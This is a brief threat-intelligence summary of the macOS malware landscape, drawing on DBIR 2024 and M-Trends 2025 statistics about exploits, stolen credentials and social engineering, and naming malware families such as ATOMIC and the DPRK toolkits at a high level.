Big-Picture MacOS Threat Climate

The notion that Macs are impervious to malware is cutting, though long stemming from Apple's tight control over its ecosystem and built-in features like XProtect & Gatekeeper and just overall smaller marketshare. From the DBIR 2024 & M-Trends 2025, a few macro truths shape some things we do on macOS:

• Exploits + Identity are the meta
  • Exploits are now the #1 initial infection vector in M-Trends (33%), with stolen creds in second place (16%).
  • DBIR shows exploitation of vulnerabilities up 180% YoY as an initial way in, tightly coupled to ransomware/extortion.

• MacOS families are evolving, not just existing
  • Families like OceanLotus, Bundlore, ATOMIC, AdaptixC2, WeaselStore, DPRK toolkits (TsunamiKit, AkdoorTea, Tropidoor) are:
    • Multi-platform.
    • Rapidly refactoring to evade XProtect.
      M-Trends shows Linux & macOS-capable families increasing, even as Windows remains dominant.
      
• Humans are still the weakest "API"
  • DBIR’s “human element” is present in 68% of breaches (phishing, pretexting, misdelivery, user error), even after stripping out malicious insiders.
  • Social engineering + user-assisted execution are absolutely core to the macOS campaigns in our latest 8 reports we analyzed.

So for macOS: we’re not in a separate world, we’re seeing the same global patterns—exploits, stolen identities, social engineering, extortion—just implemented with AppleScript, LaunchAgents, /tmp binaries, npm scripts, and curl.